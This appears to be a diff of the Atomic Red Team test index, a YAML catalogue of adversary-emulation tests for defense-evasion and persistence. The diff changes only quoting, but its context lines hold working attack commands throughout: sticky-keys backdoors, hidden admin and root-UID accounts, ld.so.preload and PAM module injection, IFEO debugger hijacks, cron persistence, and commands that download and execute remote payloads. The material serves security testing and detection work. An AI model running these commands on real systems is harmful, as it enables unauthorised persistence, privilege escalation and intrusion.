recursively auto_generated_guid: a8206bcc-f282-40a9-a389-05d9c0263485 @@ -39510,10 +39510,10 @@ defense-evasion: dependencies: - description: 'Test requrires a file to modify to be located at (#{file_or_folder}) - ' +' prereq_command: 'IF EXIST #{file_or_folder} ( EXIT 0 ) ELSE ( EXIT 1 ) - ' +' get_prereq_command: | mkdir #{file_or_folder} echo T1222.001_cacls1 >> #{file_or_folder}\T1222.001_cacls1.txt @@ -39521,7 +39521,7 @@ defense-evasion: executor: command: 'icacls.exe #{file_or_folder} /grant #{user_or_group}:F - ' +' name: command_prompt - name: attrib - Remove read-only attribute auto_generated_guid: bec1e95c-83aa-492e-ab77-60c71bbd21b0 @@ -39539,10 +39539,10 @@ defense-evasion: dependencies: - description: 'Test requrires a file to modify to be located at (#{file_or_folder}) - ' +' prereq_command: 'IF EXIST #{file_or_folder} ( EXIT 0 ) ELSE ( EXIT 1 ) - ' +' get_prereq_command: | mkdir #{file_or_folder} echo T1222.001_attrib1 >> #{file_or_folder}\T1222.001_attrib1.txt @@ -39552,7 +39552,7 @@ defense-evasion: executor: command: 'attrib.exe -r #{file_or_folder}\*.* /s - ' +' name: command_prompt - name: attrib - hide file auto_generated_guid: 32b979da-7b68-42c9-9a99-0e39900fc36c @@ -39575,7 +39575,7 @@ defense-evasion: attrib.exe +h #{file_or_folder}\T1222.001_attrib2.txt cleanup_command: 'del /A:H #{file_or_folder}\T1222.001_attrib*.txt >nul 2>&1 - ' +' name: command_prompt - name: Grant Full Access to folder for Everyone - Ryuk Ransomware Style auto_generated_guid: ac7e6118-473d-41ec-9ac0-ef4f1d1ed2f6 @@ -39600,18 +39600,18 @@ defense-evasion: - description: 'Backup of original folder permissions should exist (for use in cleanup commands) - ' +' prereq_command: 'IF EXIST #{file_path} ( EXIT 0 ) ELSE ( EXIT 1 ) - ' +' get_prereq_command: 'icacls #{path} /save #{file_path} /t /q >nul 2>&1 - ' +' executor: command: icacls "#{path}" /grant Everyone:F /T /C /Q cleanup_command: 'icacls ''#{path}'' /restore #{file_path} /q >nul 2>&1 - ' +' name: command_prompt elevation_required: true T1220: @@ -39725,37 +39725,37 @@ defense-evasion: dependencies: - description: 'XML file must exist on disk at specified location (#{xmlfile}) - ' +' prereq_command: 'if (Test-Path #{xmlfile}) {exit 0} else {exit 1} - ' +' get_prereq_command: | New-Item -Type Directory (split-path #{xmlfile}) -ErrorAction Ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1220/src/msxslxmlfile.xml" -OutFile "#{xmlfile}" - description: 'XSL file must exist on disk at specified location (#{xslfile}) - ' +' prereq_command: 'if (Test-Path #{xslfile}) {exit 0} else {exit 1} - ' +' get_prereq_command: | New-Item -Type Directory (split-path #{xslfile}) -ErrorAction Ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1220/src/msxslscript.xsl" -OutFile "#{xslfile}" - description: 'msxsl.exe must exist on disk at specified location (#{msxsl_exe}) - ' +' prereq_command: 'if (Test-Path #{msxsl_exe}) {exit 0} else {exit 1} - ' +' get_prereq_command: 'Invoke-WebRequest "https://web.archive.org/web/20200803205229if_/https://download.microsoft.com/download/f/2/6/f263ac46-1fe9-4ae9-8fd3-21102100ebf5/msxsl.exe" -OutFile "#{msxsl_exe}" - ' +' executor: command: "#{msxsl_exe} #{xmlfile} #{xslfile}\n" cleanup_command: 'del #{msxsl_exe} >nul 2>&1 - ' +' name: command_prompt - name: MSXSL Bypass using remote files auto_generated_guid: a7c3ab07-52fb-49c8-ab6d-e9c6d4a0a985 @@ -39783,26 +39783,26 @@ defense-evasion: dependencies: - description: 'msxsl.exe must exist on disk at specified location (#{msxsl_exe}) - ' +' prereq_command: 'if (Test-Path #{msxsl_exe}) {exit 0} else {exit 1} - ' +' get_prereq_command: 'Invoke-WebRequest "https://web.archive.org/web/20200803205229if_/https://download.microsoft.com/download/f/2/6/f263ac46-1fe9-4ae9-8fd3-21102100ebf5/msxsl.exe" -OutFile "#{msxsl_exe}" - ' +' executor: command: "#{msxsl_exe} #{xmlfile} #{xslfile}\n" cleanup_command: 'del -Path #{msxsl_exe} >nul 2>&1 - ' +' name: command_prompt - name: WMIC bypass using local XSL file auto_generated_guid: 1b237334-3e21-4a0c-8178-b8c996124988 description: 'Executes the code specified within a XSL script using a local payload. - ' +' supported_platforms: - windows input_arguments: @@ -39818,17 +39818,17 @@ defense-evasion: dependencies: - description: 'XSL file must exist on disk at specified location (#{local_xsl_file}) - ' +' prereq_command: 'if (Test-Path #{local_xsl_file}) {exit 0} else {exit 1} - ' +' get_prereq_command: | New-Item -Type Directory (split-path #{local_xsl_file}) -ErrorAction Ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1220/src/wmicscript.xsl" -OutFile "#{local_xsl_file}" executor: command: 'wmic #{wmic_command} /FORMAT:"#{local_xsl_file}" - ' +' name: command_prompt - name: WMIC bypass using remote XSL file auto_generated_guid: 7f5be499-33be-4129-a560-66021f379b9b @@ -39836,7 +39836,7 @@ defense-evasion: payload. Open Calculator.exe when test successfully executed, while AV turned off. - ' +' supported_platforms: - windows input_arguments: @@ -39851,7 +39851,7 @@ defense-evasion: executor: command: 'wmic #{wmic_command} /FORMAT:"#{remote_xsl_file}" - ' +' name: command_prompt persistence: T1546.008: @@ -39945,7 +39945,7 @@ persistence: description: 'Comma separated list of system binaries to which you want to attach each #{attached_process}. Default: "osk.exe" - ' +' type: String default: osk.exe, sethc.exe, utilman.exe, magnify.exe, narrator.exe, DisplaySwitch.exe, atbroker.exe @@ -39953,7 +39953,7 @@ persistence: description: 'Full path to process to attach to target in #{parent_list}. Default: cmd.exe - ' +' type: Path default: C:\windows\system32\cmd.exe executor: @@ -39987,7 +39987,7 @@ persistence: auto_generated_guid: 934e90cf-29ca-48b3-863c-411737ad44e3 description: 'Replace sticky keys binary (sethc.exe) with cmd.exe - ' +' supported_platforms: - windows executor: @@ -39998,7 +39998,7 @@ persistence: copy /Y C:\Windows\System32\cmd.exe C:\Windows\System32\sethc.exe cleanup_command: 'copy /Y C:\Windows\System32\sethc_backup.exe C:\Windows\System32\sethc.exe - ' +' name: command_prompt elevation_required: true T1098: @@ -40075,7 +40075,7 @@ persistence: auto_generated_guid: 5598f7cb-cf43-455e-883a-f6008c5d46af description: 'Manipulate Admin Account Name - ' +' supported_platforms: - windows executor: @@ -40141,7 +40141,7 @@ persistence: dependencies: - description: 'PS Module ActiveDirectory - ' +' prereq_command: "Try {\n Import-Module ActiveDirectory -ErrorAction Stop | Out-Null\n exit 0\n} \nCatch {\n exit 1\n}\n" get_prereq_command: | @@ -40164,14 +40164,14 @@ persistence: cleanup_command: 'Get-ADUser -LDAPFilter "(&(samaccountname=#{account_prefix}-*)(givenName=Test))" | Remove-ADUser -Confirm:$False - ' +' name: powershell - name: AWS - Create a group and add a user to that group auto_generated_guid: 8822c3b0-d9f9-4daf-a043-49f110a31122 description: 'Adversaries create AWS group, add users to specific to that group to elevate their privilieges to gain more accesss - ' +' supported_platforms: - iaas:aws input_arguments: @@ -40183,14 +40183,14 @@ persistence: - description: 'Check if the user exists, we can only add a user to a group if the user exists. - ' +' prereq_command: 'aws iam list-users | grep #{username} - ' +' get_prereq_command: 'echo Please run atomic test T1136.003, before running this atomic test - ' +' executor: command: | aws iam create-group --group-name #{username} @@ -40404,7 +40404,7 @@ persistence: command: 'powershell -c "iwr -URI ''#{xll_url}'' -o ''#{local_file}''; IEX ((new-object -ComObject excel.application).RegisterXLL(''$env:tmp\HelloWorldXll.xll''))" - ' +' T1098.001: technique: external_references: @@ -40511,14 +40511,14 @@ persistence: dependencies: - description: 'AzureAD module must be installed. - ' +' prereq_command: 'try {if (Get-InstalledModule -Name AzureAD -ErrorAction SilentlyContinue) {exit 0} else {exit 1}} catch {exit 1} - ' +' get_prereq_command: 'Install-Module -Name AzureAD -Force - ' +' executor: command: | Import-Module -Name AzureAD @@ -40591,14 +40591,14 @@ persistence: dependencies: - description: 'AzureAD module must be installed. - ' +' prereq_command: 'try {if (Get-InstalledModule -Name AzureAD -ErrorAction SilentlyContinue) {exit 0} else {exit 1}} catch {exit 1} - ' +' get_prereq_command: 'Install-Module -Name AzureAD -Force - ' +' executor: command: | Import-Module -Name AzureAD @@ -40642,7 +40642,7 @@ persistence: description: 'Adversaries create their own new access and secret keys to programatically interact with AWS environment, which is already compromised - ' +' supported_platforms: - iaas:aws input_arguments: @@ -40653,14 +40653,14 @@ persistence: dependencies: - description: 'Check if the user exists. - ' +' prereq_command: 'aws iam list-users | grep #{username} - ' +' get_prereq_command: 'echo Please run atomic test T1136.003, before running this atomic - ' +' executor: command: | aws iam create-access-key --user-name #{username} > $PathToAtomicsFolder/T1098.001/bin/aws_secret.creds @@ -40855,11 +40855,11 @@ persistence: - description: 'Reg files must exist on disk at specified locations (#{registry_file} and #{registry_cleanup_file}) - ' +' prereq_command: 'if ((Test-Path #{registry_file}) -and (Test-Path #{registry_cleanup_file})) {exit 0} else {exit 1} - ' +' get_prereq_command: | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 New-Item -Type Directory (split-path #{registry_file}) -ErrorAction ignore | Out-Null @@ -40868,11 +40868,11 @@ persistence: - description: 'DLL''s must exist in the C:\Tools directory (T1546.010.dll and T1546.010x86.dll) - ' +' prereq_command: 'if ((Test-Path c:\Tools\T1546.010.dll) -and (Test-Path c:\Tools\T1546.010x86.dll)) {exit 0} else {exit 1} - ' +' get_prereq_command: | New-Item -Type Directory C:\Tools -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1546.010/bin/T1546.010.dll" -OutFile C:\Tools\T1546.010.dll @@ -40880,10 +40880,10 @@ persistence: executor: command: 'reg.exe import #{registry_file} - ' +' cleanup_command: 'reg.exe import #{registry_cleanup_file} >nul 2>&1 - ' +' name: command_prompt elevation_required: true T1546.011: @@ -40991,31 +40991,31 @@ persistence: - description: 'Shim database file must exist on disk at specified location (#{file_path}) - ' +' prereq_command: 'if (Test-Path #{file_path}) {exit 0} else {exit 1} - ' +' get_prereq_command: | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 New-Item -Type Directory (split-path #{file_path}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1546.011/bin/AtomicShimx86.sdb" -OutFile "#{file_path}" - description: 'AtomicTest.dll must exist at c:\Tools\AtomicTest.dll - ' +' prereq_command: 'if (Test-Path c:\Tools\AtomicTest.dll) {exit 0} else {exit 1} - ' +' get_prereq_command: | New-Item -Type Directory (split-path c:\Tools\AtomicTest.dll) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1546.011/bin/AtomicTest.dll" -OutFile c:\Tools\AtomicTest.dll executor: command: 'sdbinst.exe #{file_path} - ' +' cleanup_command: 'sdbinst.exe -u #{file_path} >nul 2>&1 - ' +' name: command_prompt elevation_required: true - name: New shim database files created in the default shim database directory @@ -41108,7 +41108,7 @@ persistence: description: 'This test submits a command to be run in the future by the `at` daemon. - ' +' supported_platforms: - linux input_arguments: @@ -41124,30 +41124,30 @@ persistence: dependencies: - description: 'The `at` and `atd` executables must exist in the PATH - ' +' prereq_command: 'which at && which atd - ' +' get_prereq_command: 'echo ''Please install `at` and `atd`; they were not found in the PATH (Package name: `at`)'' - ' +' - description: 'The `atd` daemon must be running - ' +' prereq_command: 'systemctl status atd || service atd status - ' +' get_prereq_command: 'echo ''Please start the `atd` daemon (sysv: `service atd start` ; systemd: `systemctl start atd`)'' - ' +' executor: name: sh elevation_required: false command: 'echo "#{at_command}" | at #{time_spec} - ' +' T1053.002: technique: external_references: @@ -41244,7 +41244,7 @@ persistence: elevation_required: false command: 'at 13:20 /interactive cmd - ' +' T1547.002: technique: id: attack-pattern--b8cfed42-6a8a-4989-ad72-541af74475ec @@ -41428,10 +41428,10 @@ persistence: command: 'bitsadmin.exe /transfer /Download /priority Foreground #{remote_file} #{local_file} - ' +' cleanup_command: 'del #{local_file} >nul 2>&1 - ' +' name: command_prompt - name: Bitsadmin Download (PowerShell) auto_generated_guid: f63b8bc4-07e5-4112-acba-56f646f3f0bc @@ -41455,10 +41455,10 @@ persistence: command: 'Start-BitsTransfer -Priority foreground -Source #{remote_file} -Destination #{local_file} - ' +' cleanup_command: 'Remove-Item #{local_file} -ErrorAction Ignore - ' +' name: powershell - name: Persist, Download, & Execute auto_generated_guid: 62a06ec5-5754-47d2-bcfc-123d8314c6ae @@ -41496,7 +41496,7 @@ persistence: bitsadmin.exe /complete #{bits_job_name} cleanup_command: 'del #{local_file} >nul 2>&1 - ' +' name: command_prompt - name: Bits download using desktopimgdownldr.exe (cmd) auto_generated_guid: afb5e09e-e385-4dee-9a94-6ee60979d114 @@ -41528,10 +41528,10 @@ persistence: command: 'set "#{download_path}" && cmd /c desktopimgdownldr.exe /lockscreenurl:#{remote_file} /eventName:desktopimgdownldr - ' +' cleanup_command: 'del #{cleanup_path}\#{cleanup_file} >nul 2>&1 - ' +' name: command_prompt T1547: technique: @@ -41856,7 +41856,7 @@ persistence: auto_generated_guid: cb790029-17e6-4c43-b96f-002ce5f10938 description: 'Create a file called test.wma, with the duration of 30 seconds - ' +' supported_platforms: - linux - windows @@ -41876,7 +41876,7 @@ persistence: sent from a compromised host. This will install one (of many) available VPNS in the Edge add-on store. - ' +' supported_platforms: - windows - macos @@ -41996,7 +41996,7 @@ persistence: - description: "#{file_name} must be present\n" prereq_command: 'if (Test-Path #{file_name}) {exit 0} else {exit 1} - ' +' get_prereq_command: | New-Item -Type Directory (split-path #{file_name}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1574.012/bin/T1574.012x64.dll" -OutFile "#{file_name}" @@ -42041,7 +42041,7 @@ persistence: - description: "#{file_name} must be present\n" prereq_command: 'if (Test-Path #{file_name}) {exit 0} else {exit 1} - ' +' get_prereq_command: | New-Item -Type Directory (split-path #{file_name}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1574.012/bin/T1574.012x64.dll" -OutFile "#{file_name}" @@ -42079,7 +42079,7 @@ persistence: - description: "#{file_name} must be present\n" prereq_command: 'if (Test-Path #{file_name}) {exit 0} else {exit 1} - ' +' get_prereq_command: | New-Item -Type Directory (split-path #{file_name}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1574.012/bin/T1574.012x64.dll" -OutFile "#{file_name}" @@ -42196,10 +42196,10 @@ persistence: executor: command: 'assoc #{extension_to_change}=#{target_extension_handler} - ' +' cleanup_command: 'assoc #{extension_to_change}=#{original_extension_handler} - ' +' name: command_prompt elevation_required: true T1136.003: @@ -42269,7 +42269,7 @@ persistence: activity do not interupt the normal functions of the compromised users and can remain undetected for a long time - ' +' supported_platforms: - iaas:aws input_arguments: @@ -42280,21 +42280,21 @@ persistence: dependencies: - description: 'Check if ~/.aws/credentials file has a default stanza is configured - ' +' prereq_command: 'cat ~/.aws/credentials | grep "default" - ' +' get_prereq_command: 'echo Please install the aws-cli and configure your AWS defult profile using: aws configure - ' +' executor: command: 'aws iam create-user --user-name #{username} - ' +' cleanup_command: 'aws iam delete-user --user-name #{username} - ' +' name: sh elevation_required: false T1078.004: @@ -42360,7 +42360,7 @@ persistence: description: 'GCP Service Accounts can be used to gain intial access as well as maintain persistence inside Google Cloud. - ' +' supported_platforms: - google-workspace - windows @@ -42395,20 +42395,20 @@ persistence: cleanup_command: 'gcloud iam service-accounts delete #{service-account-email} --quiet - ' +' dependency_executor_name: gcloud dependencies: - description: 'Requires gcloud - ' +' prereq_command: 'if [ -x "$(command -v gcloud)" ]; then exit 0; else exit 1; fi; - ' +' get_prereq_command: 'echo "Please Install Google Cloud SDK before running this atomic test : https://cloud.google.com/sdk/docs/install" - ' +' T1542.002: technique: created: '2019-12-19T20:21:21.669Z' @@ -42645,7 +42645,7 @@ persistence: CronJob for scheduling execution of malicious code that would run as a container in the cluster. - ' +' supported_platforms: - containers input_arguments: @@ -42656,17 +42656,17 @@ persistence: dependencies: - description: 'kubectl must be installed - ' +' get_prereq_command: 'echo "kubectl must be installed manually" - ' +' prereq_command: 'which kubectl - ' +' executor: command: 'kubectl get cronjobs -n #{namespace} - ' +' name: bash elevation_required: false - name: CreateCronjob @@ -42678,7 +42678,7 @@ persistence: CronJob for scheduling execution of malicious code that would run as a container in the cluster. - ' +' supported_platforms: - containers input_arguments: @@ -42689,20 +42689,20 @@ persistence: dependencies: - description: 'kubectl must be installed - ' +' get_prereq_command: 'echo "kubectl must be installed manually" - ' +' prereq_command: 'which kubectl - ' +' executor: command: 'kubectl create -f src/cronjob.yaml -n #{namespace} - ' +' cleanup_command: 'kubectl delete cronjob art -n #{namespace} - ' +' name: bash elevation_required: false T1136: @@ -42884,7 +42884,7 @@ persistence: of the referenced file. This technique was used by numerous IoT automated exploitation attacks. - ' +' supported_platforms: - macos - linux @@ -42904,7 +42904,7 @@ persistence: echo "* * * * * #{command}" > #{tmp_cron} && crontab #{tmp_cron} cleanup_command: 'crontab /tmp/notevil - ' +' - name: Cron - Add script to all cron subfolders auto_generated_guid: b7d42afa-9086-4c8a-b7b0-8ea3faa6ebb0 description: 'This test adds a script to /etc/cron.hourly, /etc/cron.daily, @@ -42912,7 +42912,7 @@ persistence: schedule. This technique was used by the threat actor Rocke during the exploitation of Linux web servers. - ' +' supported_platforms: - macos - linux @@ -42944,7 +42944,7 @@ persistence: to execute on a schedule. This technique was used by the threat actor Rocke during the exploitation of Linux web servers. - ' +' supported_platforms: - linux input_arguments: @@ -42961,10 +42961,10 @@ persistence: name: bash command: 'echo "#{command}" >> /var/spool/cron/crontabs/#{cron_script_name} - ' +' cleanup_command: 'rm /var/spool/cron/crontabs/#{cron_script_name} - ' +' T1574.001: technique: id: attack-pattern--2fee9321-3e71-4cf4-af24-d4d40d355b34 @@ -43139,10 +43139,10 @@ persistence: dependencies: - description: 'Gup.exe binary must exist on disk at specified location (#{gup_executable}) - ' +' prereq_command: 'if (Test-Path #{gup_executable}) {exit 0} else {exit 1} - ' +' get_prereq_command: | New-Item -Type Directory (split-path #{gup_executable}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.002/bin/GUP.exe?raw=true" -OutFile "#{gup_executable}" @@ -43150,7 +43150,7 @@ persistence: command: "#{gup_executable}\n" cleanup_command: 'taskkill /F /IM #{process_name} >nul 2>&1 - ' +' name: command_prompt T1078.001: technique: @@ -43270,7 +43270,7 @@ persistence: description: 'The Adversaries can activate the default Guest user. The guest account is inactivated by default - ' +' supported_platforms: - windows input_arguments: @@ -43281,10 +43281,10 @@ persistence: executor: command: 'net user #{guest_user} /active:yes - ' +' cleanup_command: 'net user #{guest_user} /active:no - ' +' name: command_prompt elevation_required: true T1136.002: @@ -43336,7 +43336,7 @@ persistence: auto_generated_guid: fcec2963-9951-4173-9bfa-98d8b7834e62 description: 'Creates a new domain admin user in a command prompt. - ' +' supported_platforms: - windows input_arguments: @@ -43358,14 +43358,14 @@ persistence: net group "#{group}" "#{username}" /add /domain cleanup_command: 'net user "#{username}" >nul 2>&1 /del /domain - ' +' name: command_prompt elevation_required: false - name: Create a new account similar to ANONYMOUS LOGON auto_generated_guid: dc7726d2-8ccb-4cc6-af22-0d5afb53a548 description: 'Create a new account similar to ANONYMOUS LOGON in a command prompt. - ' +' supported_platforms: - windows input_arguments: @@ -43380,10 +43380,10 @@ persistence: executor: command: 'net user "#{username}" "#{password}" /add /domain - ' +' cleanup_command: 'net user "#{username}" >nul 2>&1 /del /domain - ' +' name: command_prompt elevation_required: false - name: Create a new Domain Account using PowerShell @@ -43391,7 +43391,7 @@ persistence: description: 'Creates a new Domain User using the credentials of the Current User - ' +' supported_platforms: - windows input_arguments: @@ -43420,7 +43420,7 @@ persistence: $User cleanup_command: 'cmd /c "net user #{username} /del >nul 2>&1" - ' +' name: powershell elevation_required: false T1078.002: @@ -43783,21 +43783,21 @@ persistence: - description: 'The shared library must exist on disk at specified location (#{path_to_shared_library}) - ' +' prereq_command: 'if [ -f #{path_to_shared_library ]; then exit 0; else exit 1; fi; - ' +' get_prereq_command: 'gcc -shared -fPIC -o #{path_to_shared_library} #{path_to_shared_library_source} - ' +' executor: command: 'sudo sh -c ''echo #{path_to_shared_library} > /etc/ld.so.preload'' - ' +' cleanup_command: 'sudo sed -i ''\~#{path_to_shared_library}~d'' /etc/ld.so.preload - ' +' name: bash elevation_required: true - name: Shared Library Injection via LD_PRELOAD @@ -43822,18 +43822,18 @@ persistence: - description: 'The shared library must exist on disk at specified location (#{path_to_shared_library}) - ' +' prereq_command: 'if [ -f #{path_to_shared_library} ]; then exit 0; else exit 1; fi; - ' +' get_prereq_command: 'gcc -shared -fPIC -o #{path_to_shared_library} #{path_to_shared_library_source} - ' +' executor: command: 'LD_PRELOAD=#{path_to_shared_library} ls - ' +' name: bash T1546.014: technique: @@ -43894,7 +43894,7 @@ persistence: description: 'Establish persistence via a rule run by OSX''s emond (Event Monitor) daemon at startup, based on https://posts.specterops.io/leveraging-emond-on-macos-for-persistence-a040a2785124 - ' +' supported_platforms: - macos input_arguments: @@ -44183,7 +44183,7 @@ persistence: description: 'Running Chrome VPN Extensions via the Registry install 2 vpn extension, please see "T1133\src\list of vpn extension.txt" to view complete list - ' +' supported_platforms: - windows input_arguments: @@ -44196,12 +44196,12 @@ persistence: type: String default: '"fcfhplploccackoneaefokcmbjfbkenj", "fdcgdnkidjaadafnichfpabhfomcebme" - ' +' dependency_executor_name: powershell dependencies: - description: 'Chrome must be installed - ' +' prereq_command: if ((Test-Path "C:\Program Files\Google\Chrome\Application\chrome.exe") -Or (Test-Path "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe")) {exit 0} else {exit 1} @@ -44421,7 +44421,7 @@ persistence: auto_generated_guid: fdda2626-5234-4c90-b163-60849a24c0b8 description: 'Leverage Global Flags Settings - ' +' supported_platforms: - windows input_arguments: @@ -44437,19 +44437,19 @@ persistence: command: 'REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\#{target_binary}" /v Debugger /d "#{payload_binary}" - ' +' cleanup_command: 'reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\#{target_binary}" /v Debugger /f >nul 2>&1 - ' +' name: command_prompt elevation_required: true - name: IFEO Global Flags auto_generated_guid: 46b1f278-c8ee-4aa5-acce-65e77b11f3c1 description: 'Leverage Global Flags Settings - ' +' supported_platforms: - windows input_arguments: @@ -44633,7 +44633,7 @@ persistence: description: 'This test uses the insmod command to load a kernel module for Linux. - ' +' supported_platforms: - linux input_arguments: @@ -44657,10 +44657,10 @@ persistence: dependencies: - description: 'The kernel module must exist on disk at specified location - ' +' prereq_command: 'if [ -f #{module_path} ]; then exit 0; else exit 1; fi; - ' +' get_prereq_command: | if [ ! -d #{temp_folder} ]; then mkdir #{temp_folder}; touch #{temp_folder}/safe_to_delete; fi; cp #{module_source_path}/* #{temp_folder}/ @@ -44669,7 +44669,7 @@ persistence: executor: command: 'sudo insmod #{module_path} - ' +' cleanup_command: | sudo rmmod #{module_name} [ -f #{temp_folder}/safe_to_delete ] && rm -rf #{temp_folder} @@ -44875,7 +44875,7 @@ persistence: auto_generated_guid: a5983dee-bf6c-4eaf-951c-dbc1a7b90900 description: 'Create a plist and execute it - ' +' supported_platforms: - macos input_arguments: @@ -44892,15 +44892,15 @@ persistence: - description: 'The shared library must exist on disk at specified location (#{path_malicious_plist}) - ' +' prereq_command: 'if [ -f #{path_malicious_plist} ]; then exit 0; else exit 1; fi; - ' +' get_prereq_command: 'echo "The shared library doesn''t exist. Check the path"; exit 1; - ' +' executor: name: bash elevation_required: true @@ -44994,7 +44994,7 @@ persistence: auto_generated_guid: 03ab8df5-3a6b-4417-b6bd-bb7a5cfd74cf description: 'Utilize LaunchDaemon to launch `Hello World` - ' +' supported_platforms: - macos input_arguments: @@ -45011,15 +45011,15 @@ persistence: - description: 'The shared library must exist on disk at specified location (#{path_malicious_plist}) - ' +' prereq_command: 'if [ -f #{path_malicious_plist} ]; then exit 0; else exit 1; fi; - ' +' get_prereq_command: 'echo "The plist file doesn''t exist. Check the path and try again."; exit 1; - ' +' executor: name: bash elevation_required: true @@ -45163,7 +45163,7 @@ persistence: auto_generated_guid: 40d8eabd-e394-46f6-8785-b9bfa1d011d2 description: 'Create a user via useradd - ' +' supported_platforms: - linux input_arguments: @@ -45174,17 +45174,17 @@ persistence: executor: command: 'useradd -M -N -r -s /bin/bash -c evil_account #{username} - ' +' cleanup_command: 'userdel #{username} - ' +' name: bash elevation_required: true - name: Create a user account on a MacOS system auto_generated_guid: '01993ba5-1da3-4e15-a719-b690d4f0f0b2' description: 'Creates a user on a MacOS system with dscl - ' +' supported_platforms: - macos input_arguments: @@ -45206,7 +45206,7 @@ persistence: dscl . -create /Users/#{username} NFSHomeDirectory /Users/#{username} cleanup_command: 'dscl . -delete /Users/#{username} - ' +' name: bash elevation_required: true - name: Create a new user in a command prompt @@ -45228,10 +45228,10 @@ persistence: executor: command: 'net user /add "#{username}" "#{password}" - ' +' cleanup_command: 'net user /del "#{username}" >nul 2>&1 - ' +' name: command_prompt elevation_required: true - name: Create a new user in PowerShell @@ -45249,10 +45249,10 @@ persistence: executor: command: 'New-LocalUser -Name "#{username}" -NoPassword - ' +' cleanup_command: 'Remove-LocalUser -Name "#{username}" -ErrorAction Ignore - ' +' name: powershell elevation_required: true - name: Create a new user in Linux with `root` UID and GID. @@ -45260,7 +45260,7 @@ persistence: description: 'Creates a new user in Linux and adds the user to the `root` group. This technique was used by adversaries during the Butter attack campaign. - ' +' supported_platforms: - linux input_arguments: @@ -45278,14 +45278,14 @@ persistence: if [ $(cat /etc/os-release | grep -i 'Name="ubuntu"') ]; then echo "#{username}:#{password}" | sudo chpasswd; else echo "#{password}" | passwd --stdin #{username}; fi; cleanup_command: 'userdel #{username} - ' +' name: bash elevation_required: true - name: Create a new Windows admin user auto_generated_guid: fda74566-a604-4581-a4cc-fbbe21d66559 description: 'Creates a new admin user in a command prompt. - ' +' supported_platforms: - windows input_arguments: @@ -45303,7 +45303,7 @@ persistence: net localgroup administrators "#{username}" /add cleanup_command: 'net user /del "#{username}" >nul 2>&1 - ' +' name: command_prompt elevation_required: true T1078.003: @@ -45431,7 +45431,7 @@ persistence: auto_generated_guid: f047c7de-a2d9-406e-a62b-12a09d9516f4 description: 'Mac logon script - ' +' supported_platforms: - macos executor: @@ -45660,7 +45660,7 @@ persistence: description: 'Netsh interacts with other operating system components using dynamic-link library (DLL) files - ' +' supported_platforms: - windows input_arguments: @@ -45671,7 +45671,7 @@ persistence: executor: command: 'netsh.exe add helper #{helper_file} - ' +' name: command_prompt T1556.004: technique: @@ -46040,11 +46040,11 @@ persistence: command: 'reg add "HKEY_CURRENT_USER\Software\Microsoft\Office test\Special\Perf" /t REG_SZ /d "#{thing_to_execute}" - ' +' cleanup_command: 'reg delete "HKEY_CURRENT_USER\Software\Microsoft\Office test\Special\Perf" /f >nul 2>&1 - ' +' name: command_prompt T1137.003: technique: @@ -46179,11 +46179,11 @@ persistence: command: 'reg.exe add HKCU\Software\Microsoft\Office\#{outlook_version}\Outlook\WebView\#{outlook_folder} /v URL /t REG_SZ /d #{url} /f - ' +' cleanup_command: 'reg.exe delete HKCU\Software\Microsoft\Office\#{outlook_version}\Outlook\WebView\#{outlook_folder} /v URL /f >nul 2>&1 - ' +' T1137.005: technique: external_references: @@ -46304,7 +46304,7 @@ persistence: description: 'Uses PowerShell to install and register a password filter DLL. Requires a reboot and administrative privileges. - ' +' supported_platforms: - windows input_arguments: @@ -46317,14 +46317,14 @@ persistence: - description: 'AtomicPasswordFilter.dll must exist on disk at specified location (#{input_dll}) - ' +' prereq_command: 'if (Test-Path #{input_dll}) {exit 0} else {exit 1} - ' +' get_prereq_command: 'Write-Host "You must provide your own password filter dll" - ' +' executor: command: | $passwordFilterName = (Copy-Item "#{input_dll}" -Destination "C:\Windows\System32" -PassThru).basename @@ -46740,7 +46740,7 @@ persistence: auto_generated_guid: 394a538e-09bb-4a4a-95d1-b93cf12682a8 description: 'Modify MacOS plist file in one of two directories - ' +' supported_platforms: - macos executor: @@ -46847,10 +46847,10 @@ persistence: elevation_required: true command: 'sudo sed -i "#{index}s,^,#{pam_rule}\n,g" #{path_to_pam_conf} - ' +' cleanup_command: 'sudo sed -i "\,#{pam_rule},d" #{path_to_pam_conf} - ' +' - name: Malicious PAM module auto_generated_guid: 65208808-3125-4a2e-8389-a0a00e9ab326 description: | @@ -46884,35 +46884,35 @@ persistence: - description: 'The PAM development library must be installed to build the PAM module - ' +' prereq_command: 'if [ -f /usr/include/security/pam_modules.h ]; then exit 0; else exit 1; fi; - ' +' get_prereq_command: 'if [ -n "`which apt-get`" ]; then sudo apt-get -y install libpam0g-dev; elif [ -n "`which yum`" ]; then sudo yum -y install pam-devel; fi - ' +' - description: 'The PAM module must exist on disk at specified location (#{path_to_pam_module}) - ' +' prereq_command: 'if [ -f #{path_to_pam_module} ]; then exit 0; else exit 1; fi; - ' +' get_prereq_command: 'sudo gcc -shared -fPIC -o #{path_to_pam_module} #{path_to_pam_module_source} - ' +' executor: name: sh elevation_required: true command: 'sudo sed -i "#{index}s,^,#{pam_rule}\n,g" #{path_to_pam_conf} - ' +' cleanup_command: 